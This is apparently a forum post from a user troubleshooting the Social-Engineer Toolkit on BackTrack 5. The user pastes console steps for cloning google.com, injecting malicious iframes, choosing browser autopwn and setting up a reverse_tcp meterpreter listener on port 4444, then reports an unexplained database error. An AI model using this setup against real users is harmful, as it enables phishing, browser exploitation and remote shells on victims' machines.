Hi, I have been working with SET a little bit now and I have come across something on ALL of the SET exploit methods on my computer... I'll go through one example.
BT5 R3 on disk
Then I go through my options...
3 (Google for template)
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:<my ip>
33 for autopwn
2 for reverse_tcp meterpreter
set:payloads> Port to use for the reverse :4444
And my problem is here
[*] Cloning the website: http://www.google.com[*] This could take a little bit...[*] Injecting iframes into cloned website for MSF Attack....[*] Malicious iframe injection successful...crafting payload.
I am not quite sure how to fix the database issue http://www.backtrack-linux.org/forum...confused.png:?
Help please. I haven't found ANY answers online through search